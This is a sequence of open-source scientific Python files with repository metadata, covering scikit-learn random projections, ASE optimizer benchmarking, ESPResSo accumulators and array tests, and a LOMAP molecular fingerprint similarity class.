<https://en.wikipedia.org/wiki/Johnson%E2%80%93Lindenstrauss_lemma>`_:
In mathematics, the Johnson-Lindenstrauss lemma is a result
concerning low-distortion embeddings of points from high-dimensional
into low-dimensional Euclidean space. The lemma states that a small set
of points in a high-dimensional space can be embedded into a space of
much lower dimension in such a way that distances between the points are
nearly preserved. The map used for the embedding is at least Lipschitz,
and can even be taken to be an orthogonal projection.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>,
# Arnaud Joly <a.joly@ulg.ac.be>
# License: BSD 3 clause
from __future__ import division
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from numpy.testing import assert_equal
import scipy.sparse as sp
from .base import BaseEstimator, TransformerMixin
from .externals import six
from .externals.six.moves import xrange
from .utils import check_random_state
from .utils.extmath import safe_sparse_dot
from .utils.random import sample_without_replacement
from .utils.validation import check_array, check_is_fitted
from .exceptions import DataDimensionalityWarning
__all__ = ["SparseRandomProjection",
"GaussianRandomProjection",
"johnson_lindenstrauss_min_dim"]
def johnson_lindenstrauss_min_dim(n_samples, eps=0.1):
"""Find a 'safe' number of components to randomly project to
The distortion introduced by a random projection `p` only changes the
distance between two points by a factor (1 +- eps) in an euclidean space
with good probability. The projection `p` is an eps-embedding as defined
by:
(1 - eps) ||u - v||^2 < ||p(u) - p(v)||^2 < (1 + eps) ||u - v||^2
Where u and v are any rows taken from a dataset of shape [n_samples,
n_features], eps is in ]0, 1[ and p is a projection by a random Gaussian
N(0, 1) matrix with shape [n_components, n_features] (or a sparse
Achlioptas matrix).
The minimum number of components to guarantee the eps-embedding is
given by:
n_components >= 4 log(n_samples) / (eps^2 / 2 - eps^3 / 3)
Note that the number of dimensions is independent of the original
number of features but instead depends on the size of the dataset:
the larger the dataset, the higher is the minimal dimensionality of
an eps-embedding.
Read more in the :ref:`User Guide <johnson_lindenstrauss>`.
Parameters
----------
n_samples : int or numpy array of int greater than 0,
Number of samples. If an array is given, it will compute
a safe number of components array-wise.
eps : float or numpy array of float in ]0,1[, optional (default=0.1)
Maximum distortion rate as defined by the Johnson-Lindenstrauss lemma.
If an array is given, it will compute a safe number of components
array-wise.
Returns
-------
n_components : int or numpy array of int,
The minimal number of components to guarantee with good probability
an eps-embedding with n_samples.
Examples
--------
>>> johnson_lindenstrauss_min_dim(1e6, eps=0.5)
663
>>> johnson_lindenstrauss_min_dim(1e6, eps=[0.5, 0.1, 0.01])
array([ 663, 11841, 1112658])
>>> johnson_lindenstrauss_min_dim([1e4, 1e5, 1e6], eps=0.1)
array([ 7894, 9868, 11841])
References
----------
.. [1] https://en.wikipedia.org/wiki/Johnson%E2%80%93Lindenstrauss_lemma
.. [2] Sanjoy Dasgupta and Anupam Gupta, 1999,
"An elementary proof of the Johnson-Lindenstrauss Lemma."
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.45.3654
"""
eps = np.asarray(eps)
n_samples = np.asarray(n_samples)
if np.any(eps <= 0.0) or np.any(eps >= 1):
raise ValueError(
"The JL bound is defined for eps in ]0, 1[, got %r" % eps)
if np.any(n_samples) <= 0:
raise ValueError(
"The JL bound is defined for n_samples greater than zero, got %r"
% n_samples)
denominator = (eps ** 2 / 2) - (eps ** 3 / 3)
return (4 * np.log(n_samples) / denominator).astype(np.int)
def _check_density(density, n_features):
"""Factorize density check according to Li et al."""
if density == 'auto':
density = 1 / np.sqrt(n_features)
elif density <= 0 or density > 1:
raise ValueError("Expected density in range ]0, 1], got: %r"
% density)
return density
def _check_input_size(n_components, n_features):
"""Factorize argument checking for random matrix generation"""
if n_components <= 0:
raise ValueError("n_components must be strictly positive, got %d" %
n_components)
if n_features <= 0:
raise ValueError("n_features must be strictly positive, got %d" %
n_components)
def gaussian_random_matrix(n_components, n_features, random_state=None):
"""Generate a dense Gaussian random matrix.
The components of the random matrix are drawn from
N(0, 1.0 / n_components).
Read more in the :ref:`User Guide <gaussian_random_matrix>`.
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Returns
-------
components : numpy array of shape [n_components, n_features]
The generated Gaussian random matrix.
See Also
--------
GaussianRandomProjection
sparse_random_matrix
"""
_check_input_size(n_components, n_features)
rng = check_random_state(random_state)
components = rng.normal(loc=0.0,
scale=1.0 / np.sqrt(n_components),
size=(n_components, n_features))
return components
def sparse_random_matrix(n_components, n_features, density='auto',
random_state=None):
"""Generalized Achlioptas random sparse matrix for random projection
Setting density to 1 / 3 will yield the original matrix by Dimitris
Achlioptas while setting a lower value will yield the generalization
by Ping Li et al.
If we note :math:`s = 1 / density`, the components of the random matrix are
drawn from:
- -sqrt(s) / sqrt(n_components) with probability 1 / 2s
- 0 with probability 1 - 1 / s
- +sqrt(s) / sqrt(n_components) with probability 1 / 2s
Read more in the :ref:`User Guide <sparse_random_matrix>`.
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
density : float in range ]0, 1] or 'auto', optional (default='auto')
Ratio of non-zero component in the random projection matrix.
If density = 'auto', the value is set to the minimum density
as recommended by Ping Li et al.: 1 / sqrt(n_features).
Use density = 1 / 3.0 if you want to reproduce the results from
Achlioptas, 2001.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Returns
-------
components : array or CSR matrix with shape [n_components, n_features]
The generated Gaussian random matrix.
See Also
--------
SparseRandomProjection
gaussian_random_matrix
References
----------
.. [1] Ping Li, T. Hastie and K. W. Church, 2006,
"Very Sparse Random Projections".
http://web.stanford.edu/~hastie/Papers/Ping/KDD06_rp.pdf
.. [2] D. Achlioptas, 2001, "Database-friendly random projections",
http://www.cs.ucsc.edu/~optas/papers/jl.pdf
"""
_check_input_size(n_components, n_features)
density = _check_density(density, n_features)
rng = check_random_state(random_state)
if density == 1:
# skip index generation if totally dense
components = rng.binomial(1, 0.5, (n_components, n_features)) * 2 - 1
return 1 / np.sqrt(n_components) * components
else:
# Generate location of non zero elements
indices = []
offset = 0
indptr = [offset]
for i in xrange(n_components):
# find the indices of the non-zero components for row i
n_nonzero_i = rng.binomial(n_features, density)
indices_i = sample_without_replacement(n_features, n_nonzero_i,
random_state=rng)
indices.append(indices_i)
offset += n_nonzero_i
indptr.append(offset)
indices = np.concatenate(indices)
# Among non zero components the probability of the sign is 50%/50%
data = rng.binomial(1, 0.5, size=np.size(indices)) * 2 - 1
# build the CSR structure by concatenating the rows
components = sp.csr_matrix((data, indices, indptr),
shape=(n_components, n_features))
return np.sqrt(1 / density) / np.sqrt(n_components) * components
class BaseRandomProjection(six.with_metaclass(ABCMeta, BaseEstimator,
TransformerMixin)):
"""Base class for random projections.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self, n_components='auto', eps=0.1, dense_output=False,
random_state=None):
self.n_components = n_components
self.eps = eps
self.dense_output = dense_output
self.random_state = random_state
@abstractmethod
def _make_random_matrix(n_components, n_features):
""" Generate the random projection matrix
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
Returns
-------
components : numpy array or CSR matrix [n_components, n_features]
The generated random matrix.
"""
def fit(self, X, y=None):
"""Generate a sparse random projection matrix
Parameters
----------
X : numpy array or scipy.sparse of shape [n_samples, n_features]
Training set: only the shape is used to find optimal random
matrix dimensions based on the theory referenced in the
afore mentioned papers.
y : is not used: placeholder to allow for usage in a Pipeline.
Returns
-------
self
"""
X = check_array(X, accept_sparse=['csr', 'csc'])
n_samples, n_features = X.shape
if self.n_components == 'auto':
self.n_components_ = johnson_lindenstrauss_min_dim(
n_samples=n_samples, eps=self.eps)
if self.n_components_ <= 0:
raise ValueError(
'eps=%f and n_samples=%d lead to a target dimension of '
'%d which is invalid' % (
self.eps, n_samples, self.n_components_))
elif self.n_components_ > n_features:
raise ValueError(
'eps=%f and n_samples=%d lead to a target dimension of '
'%d which is larger than the original space with '
'n_features=%d' % (self.eps, n_samples, self.n_components_,
n_features))
else:
if self.n_components <= 0:
raise ValueError("n_components must be greater than 0, got %s"
% self.n_components)
elif self.n_components > n_features:
warnings.warn(
"The number of components is higher than the number of"
" features: n_features < n_components (%s < %s)."
"The dimensionality of the problem will not be reduced."
% (n_features, self.n_components),
DataDimensionalityWarning)
self.n_components_ = self.n_components
# Generate a projection matrix of size [n_components, n_features]
self.components_ = self._make_random_matrix(self.n_components_,
n_features)
# Check contract
assert_equal(
self.components_.shape,
(self.n_components_, n_features),
err_msg=('An error has occurred the self.components_ matrix has '
' not the proper shape.'))
return self
def transform(self, X, y=None):
"""Project the data by using matrix product with the random matrix
Parameters
----------
X : numpy array or scipy.sparse of shape [n_samples, n_features]
The input data to project into a smaller dimensional space.
y : is not used: placeholder to allow for usage in a Pipeline.
Returns
-------
X_new : numpy array or scipy sparse of shape [n_samples, n_components]
Projected array.
"""
X = check_array(X, accept_sparse=['csr', 'csc'])
check_is_fitted(self, 'components_')
if X.shape[1] != self.components_.shape[1]:
raise ValueError(
'Impossible to perform projection:'
'X at fit stage had a different number of features. '
'(%s != %s)' % (X.shape[1], self.components_.shape[1]))
X_new = safe_sparse_dot(X, self.components_.T,
dense_output=self.dense_output)
return X_new
class GaussianRandomProjection(BaseRandomProjection):
"""Reduce dimensionality through Gaussian random projection
The components of the random matrix are drawn from N(0, 1 / n_components).
Read more in the :ref:`User Guide <gaussian_random_matrix>`.
Parameters
----------
n_components : int or 'auto', optional (default = 'auto')
Dimensionality of the target projection space.
n_components can be automatically adjusted according to the
number of samples in the dataset and the bound given by the
Johnson-Lindenstrauss lemma. In that case the quality of the
embedding is controlled by the ``eps`` parameter.
It should be noted that Johnson-Lindenstrauss lemma can yield
very conservative estimated of the required number of components
as it makes no assumption on the structure of the dataset.
eps : strictly positive float, optional (default=0.1)
Parameter to control the quality of the embedding according to
the Johnson-Lindenstrauss lemma when n_components is set to
'auto'.
Smaller values lead to better embedding and higher number of
dimensions (n_components) in the target projection space.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Attributes
----------
n_component_ : int
Concrete number of components computed when n_components="auto".
components_ : numpy array of shape [n_components, n_features]
Random matrix used for the projection.
See Also
--------
SparseRandomProjection
"""
def __init__(self, n_components='auto', eps=0.1, random_state=None):
super(GaussianRandomProjection, self).__init__(
n_components=n_components,
eps=eps,
dense_output=True,
random_state=random_state)
def _make_random_matrix(self, n_components, n_features):
""" Generate the random projection matrix
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
Returns
-------
components : numpy array or CSR matrix [n_components, n_features]
The generated random matrix.
"""
random_state = check_random_state(self.random_state)
return gaussian_random_matrix(n_components,
n_features,
random_state=random_state)
class SparseRandomProjection(BaseRandomProjection):
"""Reduce dimensionality through sparse random projection
Sparse random matrix is an alternative to dense random
projection matrix that guarantees similar embedding quality while being
much more memory efficient and allowing faster computation of the
projected data.
If we note `s = 1 / density` the components of the random matrix are
drawn from:
- -sqrt(s) / sqrt(n_components) with probability 1 / 2s
- 0 with probability 1 - 1 / s
- +sqrt(s) / sqrt(n_components) with probability 1 / 2s
Read more in the :ref:`User Guide <sparse_random_matrix>`.
Parameters
----------
n_components : int or 'auto', optional (default = 'auto')
Dimensionality of the target projection space.
n_components can be automatically adjusted according to the
number of samples in the dataset and the bound given by the
Johnson-Lindenstrauss lemma. In that case the quality of the
embedding is controlled by the ``eps`` parameter.
It should be noted that Johnson-Lindenstrauss lemma can yield
very conservative estimated of the required number of components
as it makes no assumption on the structure of the dataset.
density : float in range ]0, 1], optional (default='auto')
Ratio of non-zero component in the random projection matrix.
If density = 'auto', the value is set to the minimum density
as recommended by Ping Li et al.: 1 / sqrt(n_features).
Use density = 1 / 3.0 if you want to reproduce the results from
Achlioptas, 2001.
eps : strictly positive float, optional, (default=0.1)
Parameter to control the quality of the embedding according to
the Johnson-Lindenstrauss lemma when n_components is set to
'auto'.
Smaller values lead to better embedding and higher number of
dimensions (n_components) in the target projection space.
dense_output : boolean, optional (default=False)
If True, ensure that the output of the random projection is a
dense numpy array even if the input and random projection matrix
are both sparse. In practice, if the number of components is
small the number of zero components in the projected data will
be very small and it will be more CPU and memory efficient to
use a dense representation.
If False, the projected data uses a sparse representation if
the input is sparse.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Attributes
----------
n_component_ : int
Concrete number of components computed when n_components="auto".
components_ : CSR matrix with shape [n_components, n_features]
Random matrix used for the projection.
density_ : float in range 0.0 - 1.0
Concrete density computed from when density = "auto".
See Also
--------
GaussianRandomProjection
References
----------
.. [1] Ping Li, T. Hastie and K. W. Church, 2006,
"Very Sparse Random Projections".
http://web.stanford.edu/~hastie/Papers/Ping/KDD06_rp.pdf
.. [2] D. Achlioptas, 2001, "Database-friendly random projections",
https://users.soe.ucsc.edu/~optas/papers/jl.pdf
"""
def __init__(self, n_components='auto', density='auto', eps=0.1,
dense_output=False, random_state=None):
super(SparseRandomProjection, self).__init__(
n_components=n_components,
eps=eps,
dense_output=dense_output,
random_state=random_state)
self.density = density
def _make_random_matrix(self, n_components, n_features):
""" Generate the random projection matrix
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
Returns
-------
components : numpy array or CSR matrix [n_components, n_features]
The generated random matrix.
"""
random_state = check_random_state(self.random_state)
self.density_ = _check_density(self.density, n_features)
return sparse_random_matrix(n_components,
n_features,
density=self.density_,
random_state=random_state)
|
RomainBrault/scikit-learn
|
sklearn/random_projection.py
|
Python
|
bsd-3-clause
| 22,969
|
[
"Gaussian"
] |
7ce7dda6b9f7e3f3194cac6d6d966fb23a6e148123250ecd06a64561b2408854
|
"""Define a helper function for running tests
The skeleton for making a new setup is as follows:
from ase.optimize.test import run_test
def get_atoms():
return Atoms('H')
def get_calculator():
return EMT()
run_test(get_atoms, get_calculator, 'Hydrogen')
"""
import time
import matplotlib
matplotlib.rcParams['backend']="Agg"
from ase.optimize.bfgs import BFGS
from ase.optimize.lbfgs import LBFGS, LBFGSLineSearch
from ase.optimize.fire import FIRE
from ase.optimize.mdmin import MDMin
from ase.optimize.sciopt import SciPyFminCG
from ase.optimize.sciopt import SciPyFminBFGS
from ase.optimize.bfgslinesearch import BFGSLineSearch
from ase.optimize.oldqn import GoodOldQuasiNewton
from ase.parallel import rank, paropen
import matplotlib.pyplot as pl
import numpy as np
import traceback
optimizers = [
'BFGS',
'LBFGS',
'LBFGSLineSearch',
'FIRE',
'MDMin',
'SciPyFminCG',
'SciPyFminBFGS',
'BFGSLineSearch',
'GoodOldQuasiNewton'
]
def get_optimizer(optimizer):
if optimizer == 'BFGS': return BFGS
elif optimizer == 'LBFGS': return LBFGS
elif optimizer == 'LBFGSLineSearch': return LBFGSLineSearch
elif optimizer == 'FIRE': return FIRE
elif optimizer == 'MDMin': return MDMin
elif optimizer == 'SciPyFminCG': return SciPyFminCG
elif optimizer == 'SciPyFminBFGS': return SciPyFminBFGS
elif optimizer == 'BFGSLineSearch': return BFGSLineSearch
elif optimizer == 'GoodOldQuasiNewton': return GoodOldQuasiNewton
def run_test(get_atoms, get_calculator, name,
fmax=0.05, steps=100, plot=True):
plotter = Plotter(name, fmax)
csvwriter = CSVWriter(name)
# write header
row = ['Optimizer', 'Optimizer Steps', 'Force evaluations', 'Energy']
row.extend(['Time [sec]', 'Note'])
format = '%s,%s,%s,%s,%s,%s\n'
csvwriter.write(row, format)
for optimizer in optimizers:
note = ''
logname = name + '-' + optimizer
atoms = get_atoms()
atoms.set_calculator(get_calculator())
opt = get_optimizer(optimizer)
relax = opt(atoms, logfile=None)
#logfile = logname + '.log',
#trajectory = logname + '.traj')
obs = DataObserver(atoms)
relax.attach(obs)
t = time.time()
try:
relax.run(fmax = fmax, steps = steps)
E = atoms.get_potential_energy()
if relax.get_number_of_steps() == steps:
note = 'Not converged in %i steps' % steps
except Exception:
traceback.print_exc()
note = 'An exception occurred'
E = np.nan
t = time.time() - t
nsteps = relax.get_number_of_steps()
if hasattr(relax, 'force_calls'):
fc = relax.force_calls
if rank == 0:
print '%-15s %-15s %3i %8.3f (%3i) %s' % (name, optimizer, nsteps, E, fc, note)
else:
fc = nsteps
if rank == 0:
print '%-15s %-15s %3i %8.3f %s' % (name, optimizer, nsteps, E, note)
plotter.plot(optimizer, obs.get_E(), obs.get_fmax())
format = '%s,%i,%i,%.5f,%i,%s\n'
row = [optimizer, nsteps, fc, E]
row.extend([int(t), note])
csvwriter.write(row, format)
plotter.save()
csvwriter.finalize()
class Plotter:
def __init__(self, name, fmax):
self.name = name
self.fmax = fmax
if rank == 0:
self.fig = pl.figure(figsize=[12.0, 9.0])
self.axes0 = self.fig.add_subplot(2, 1, 1)
self.axes1 = self.fig.add_subplot(2, 1, 2)
def plot(self, optimizer, E, fmax):
if rank == 0:
self.axes0.plot(E, label = optimizer)
self.axes1.plot(fmax)
def save(self, format='png'):
if rank == 0:
self.axes0.legend()
self.axes0.set_title(self.name)
self.axes0.set_ylabel('E [eV]')
#self.axes0.set_yscale('log')
self.axes1.set_xlabel('steps')
self.axes1.set_ylabel('fmax [eV/A]')
self.axes1.set_yscale('log')
self.axes1.axhline(self.fmax, color='k', linestyle='--')
self.fig.savefig(self.name + '.' + format)
class CSVWriter:
def __init__(self, name):
self.f = paropen(name + '.csv', 'w')
def write(self, row, format):
self.f.write(format % tuple(row))
def finalize(self):
self.f.close()
class DataObserver:
def __init__(self, atoms):
self.atoms = atoms
self.E = []
self.fmax = []
def __call__(self):
self.E.append(self.atoms.get_potential_energy())
self.fmax.append(np.sqrt((self.atoms.get_forces()**2).sum(axis=1)).max())
def get_E(self):
return np.array(self.E)
def get_fmax(self):
return np.array(self.fmax)
|
conwayje/ase-python
|
ase/optimize/test/__init__.py
|
Python
|
gpl-2.0
| 4,860
|
[
"ASE"
] |
a6903138ae8b50d7025767e471f95e54f6b849472507937ae6744e1ea7c2e8f9
|
from __future__ import print_function, absolute_import
from .script_interface import ScriptInterfaceHelper, script_interface_register
import numpy as np
@script_interface_register
class MeanVarianceCalculator(ScriptInterfaceHelper):
"""
Accumulates results from observables.
Parameters
----------
obs : Instance of :class:`espressomd.observables.Observable`.
delta_N : :obj:`int`
Number of timesteps between subsequent samples for the auto update mechanism.
Methods
-------
update
Update the accumulator (get the current values from the observable).
get_mean
Returns the samples mean values of the respective observable with which the
accumulator was initialized.
get_variance
Returns the samples variance for the observable.
"""
_so_name = "Accumulators::MeanVarianceCalculator"
_so_bind_methods = (
"update",
"get_mean",
"get_variance"
)
_so_creation_policy = "LOCAL"
@script_interface_register
class Correlator(ScriptInterfaceHelper):
"""
Calculates correlations based on results from observables.
Parameters
----------
obs1, obs2 : Instances of :class:`espressomd.observables.Observable`.
The observables A and B that are to be correlated. If `obs2`
is omitted, autocorrelation of `obs1` is calculated by
default.
corr_operation : :obj:`str`
The operation that is performed on :math:`A(t)` and
:math:`B(t+\\tau)` to obtain :math:`C(\\tau)`. The
following operations are currently available:
* `scalar_product`: Scalar product of :math:`A` and
:math:`B`, i.e., :math:`C=\sum\limits_{i} A_i B_i`
* `componentwise_product`: Componentwise product of
:math:`A` and :math:`B`, i.e., :math:`C_i = A_i B_i`
* `square_distance_componentwise`: Each component of
the correlation vector is the square of the difference
between the corresponding components of the
observables, i.E., :math:`C_i = (A_i-B_i)^2`. Example:
when :math:`A` is `ParticlePositions`, it produces the
mean square displacement (for each component
separately).
* `tensor_product`: Tensor product of :math:`A` and
:math:`B`, i.e., :math:`C_{i \\cdot l_B + j} = A_i B_j`
with :math:`l_B` the length of :math:`B`.
* `complex_conjugate_product`: assuming that the observables
consist of a complex and real part
:math:`A=(A_x+iA_y)`, and :math:`B=(B_x+iB_y)`, this
operation computes the result :math:`C=(C_x+iC_y)`,
as:
.. math::
C_x = A_xB_x + A_yB_y\\\\
C_y = A_yB_x - A_xB_y
* `fcs_acf`:
Fluorescence Correlation Spectroscopy (FCS)
autocorrelation function, i.e.,
.. math::
G_i(\\tau) =
\\frac{1}{N} \\left< \\exp \\left(
- \\frac{\\Delta x_i^2(\\tau)}{w_x^2}
- \\frac{\\Delta y_i^2(\\tau)}{w_y^2}
- \\frac{\\Delta z_i^2(\\tau)}{w_z^2}
\\right) \\right>
where
.. math::
\\Delta x_i^2(\\tau) = \\left( x_i(0) - x_i(\\tau) \\right)^2
is the square displacement of particle
:math:`i` in the :math:`x` direction, and :math:`w_x`
is the beam waist of the intensity profile of the
exciting laser beam,
.. math::
W(x,y,z) = I_0 \\exp
\\left( - \\frac{2x^2}{w_x^2} - \\frac{2y^2}{w_y^2} -
\\frac{2z^2}{w_z^2} \\right).
The values of :math:`w_x`, :math:`w_y`, and :math:`w_z`
are passed to the correlator as `args`
The above equations are a
generalization of the formula presented by Hoefling
et. al. :cite:`hofling11a`. For more information, see
references therein. Per each 3 dimensions of the
observable, one dimension of the correlation output
is produced. If `fcs_acf` is used with other
observables than `ParticlePositions`, the physical
meaning of the result is unclear.
delta_N : :obj:`int`
Number of timesteps between subsequent samples for the auto update mechanism.
tau_max : :obj:`float`
This is the maximum value of :math:`\tau` for which the
correlation should be computed. Warning: Unless you are using
the multiple tau correlator, choosing `tau_max` of more than
100`dt` will result in a huge computational overhead. In a
multiple tau correlator with reasonable parameters, `tau_max`
can span the entire simulation without too much additional cpu
time.
tau_lin : :obj:`int`
The number of data-points for which the results are linearly spaced
in `tau`. This is a parameter of the multiple tau correlator. If you
want to use it, make sure that you know how it works. By default, it
is set equal to `tau_max` which results in the trivial linear
correlator. By setting `tau_lin` < `tau_max` the multiple
tau correlator is switched on. In many cases, `tau_lin`=16 is a
good choice but this may strongly depend on the observables you are
correlating. For more information, we recommend to read
Ref. :cite:`ramirez10a` or to perform your own tests.
compress1 and compress2 : :obj:`str`
These functions are used to compress the data when
going to the next level of the multiple tau
correlator. This is done by producing one value out of two.
The following compression functions are available:
* `discard2`: (default value) discard the second value from the time series, use the first value as the result
* `discard1`: discard the first value from the time series, use the second value as the result
* `linear`: make a linear combination (average) of the two values
If only `compress1` is specified, then
the same compression function is used for both
observables. If both `compress1` and `compress2` are specified,
then `compress1` is used for `obs1` and `compress2` for `obs2`.
Both `discard1` and `discard2` are safe for all
observables but produce poor statistics in the
tail. For some observables, `linear` compression
can be used which makes an average of two
neighboring values but produces systematic
errors. Depending on the observable, the
systematic error using the `linear` compression
can be anything between harmless and disastrous.
For more information, we recommend to read Ref.
:cite:`ramirez10a` or to perform your own tests.
args: :obj:`float[3]`
Three floats which are passed as arguments to the
correlation function. Currently it is only used by
fcs_acf. Other correlation operations will ignore these
values.
"""
_so_name = "Accumulators::Correlator"
_so_bind_methods = (
"update",
"finalize")
_so_creation_policy = "LOCAL"
def result(self):
res = np.array(self.call_method("get_correlation"))
return res.reshape((self.n_result, 2 + self.dim_corr))
@script_interface_register
class AutoUpdateAccumulators(ScriptInterfaceHelper):
"""
Class for handling auto-update of Accumulators used by
:class:`espressomd.System`.
"""
_so_name = "Accumulators::AutoUpdateAccumulators"
_so_creation_policy = "LOCAL"
def add(self, Accumulator):
"""
Adds a Accumulator instance to the auto-update list in the system.
"""
self.call_method("add", object=Accumulator)
def remove(self, Accumulator):
"""
Removes an MeanVarianceCalculator from the auto-update list.
"""
self.call_method("remove", object=Accumulator)
|
KonradBreitsprecher/espresso
|
src/python/espressomd/accumulators.py
|
Python
|
gpl-3.0
| 9,736
|
[
"exciting"
] |
b5e8484d3c3ef30006a61ad7bb6c1dd22b4643ce21f07a6b499fc9299da87036
|
#******************
# MODULE DOCSTRING
#******************
"""
LOMAP: fingerprint calculations
=====
Alchemical free energy calculations hold increasing promise as an aid to drug
discovery efforts. However, applications of these techniques in discovery
projects have been relatively few, partly because of the difficulty of planning
and setting up calculations. The Lead Optimization Mapper (LOMAP) is an
automated algorithm to plan efficient relative free energy calculations between
potential ligands within a substantial of compounds.
"""
#*****************************************************************************
# Lomap2: A toolkit to plan alchemical relative binding affinity calculations
# Copyright 2015 - 2016 UC Irvine and the Authors
#
# Authors: Dr Gaetano Calabro' and Dr David Mobley
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, see http://www.gnu.org/licenses/
#*****************************************************************************
#****************
# MODULE IMPORTS
#****************
from rdkit import Chem
from rdkit.Chem import rdFMCS
from rdkit.Chem import AllChem
from rdkit.Chem.Draw.MolDrawing import DrawingOptions
from rdkit.Chem import Draw
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
import sys
import math
from rdkit import RDLogger
import logging
import argparse
#*******************************
# Figureprint Class
#*******************************
__all__ = ['FIGUREPRINT']
class Figureprint(object):
"""
This class is used to compute the Maximum Common Subgraph (MCS) between two
RDkit molecule objects and to score their similarity by using defined rules
"""
def __init__(self, moli, molj ):
"""
Inizialization function
Parameters
----------
moli : RDKit molecule object
the first molecule used to perform the Figureprint calculation
molj : RDKit molecule object
the second molecule used to perform the Figureprint calculation
options : argparse python object
the list of user options
"""
# Set logging level and format
logging.basicConfig(format='%(levelname)s:\t%(message)s', level=logging.INFO)
# Local pointers to the passed molecules
self.moli = moli
self.molj = molj
if not options.verbose == 'pedantic':
lg = RDLogger.logger()
lg.setLevel(RDLogger.CRITICAL)
self.fps_moli = FingerprintMols.FingerprintMol(self.moli)
self.fps_molj = FingerprintMols.FingerprintMol(self.molj)
self.fps_tan = DataStructs.FingerprintSimilarity(self.fps_moli, self.fps_molj)
def get_fps_tan(self):
return self.fps_tan
|
nividic/Lomap
|
lomap/fp.py
|
Python
|
lgpl-2.1
| 3,370
|
[
"RDKit"
] |
a51135b2923edf7306a5fa3654e777775fb1fe8d62cbc0b6215c46636c5b5f05
|
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest as ut
import numpy as np
import espressomd
import espressomd.lb
import espressomd.utils
import unittest_decorators as utx
class ArrayCommon(ut.TestCase):
def assert_operator_usage_raises(self, array):
with self.assertRaises(ValueError):
array[0] = 0
with self.assertRaises(ValueError):
array += [1, 1, 1]
with self.assertRaises(ValueError):
array -= [1, 1, 1]
with self.assertRaises(ValueError):
array *= [1, 1, 1]
with self.assertRaises(ValueError):
array /= [1, 1, 1]
with self.assertRaises(ValueError):
array //= [1, 1, 1]
with self.assertRaises(ValueError):
array %= [1, 1, 1]
with self.assertRaises(ValueError):
array **= [1, 1, 1]
with self.assertRaises(ValueError):
array <<= [1, 1, 1]
with self.assertRaises(ValueError):
array >>= [1, 1, 1]
with self.assertRaises(ValueError):
array &= [1, 1, 1]
with self.assertRaises(ValueError):
array |= [1, 1, 1]
with self.assertRaises(ValueError):
array ^= [1, 1, 1]
class ArrayLockedTest(ArrayCommon):
def test_locked_operators(self):
array = espressomd.utils.array_locked([1., 2., 3.])
self.assert_operator_usage_raises(array)
def test_unlocked_operators(self):
array = espressomd.utils.array_locked([1, 2, 3])
array2 = espressomd.utils.array_locked([4, 5, 6])
add = array + array2
sub = array - array2
self.assertIsInstance(add, np.ndarray)
self.assertIsInstance(sub, np.ndarray)
self.assertTrue(add.flags.writeable)
self.assertTrue(sub.flags.writeable)
np.testing.assert_array_equal(
add, np.add(np.copy(array), np.copy(array2)))
np.testing.assert_array_equal(
sub, np.subtract(
np.copy(array), np.copy(array2)))
np.testing.assert_array_equal(sub, -(array2 - array))
def test_copy_is_writeable(self):
array = np.copy(espressomd.utils.array_locked([1, 2, 3]))
self.assertTrue(array.flags.writeable)
def test_setter(self):
array = espressomd.utils.array_locked([1, 2, 3])
array = [4, 5, 6]
np.testing.assert_array_equal(array, [4, 5, 6])
def check_array_writable(array):
value = np.random.random(array.shape[0]).astype(type(array[0]))
array = value
np.testing.assert_array_almost_equal(np.copy(array), value)
class ArrayPropertyTest(ArrayCommon):
system = espressomd.System(box_l=[1.0, 1.0, 1.0])
system.box_l = [12.0, 12.0, 12.0]
system.time_step = 0.01
system.cell_system.skin = 0.01
system.part.add(pos=[0, 0, 0])
def setUp(self):
self.system.box_l = [12.0, 12.0, 12.0]
def tearDown(self):
self.system.actors.clear()
def assert_copy_is_writable(self, array):
cpy = np.copy(array)
self.assertTrue(cpy.flags.writeable)
def test_common(self):
self.assert_operator_usage_raises(self.system.part[0].pos)
self.assert_operator_usage_raises(self.system.part[0].v)
self.assert_operator_usage_raises(self.system.part[0].f)
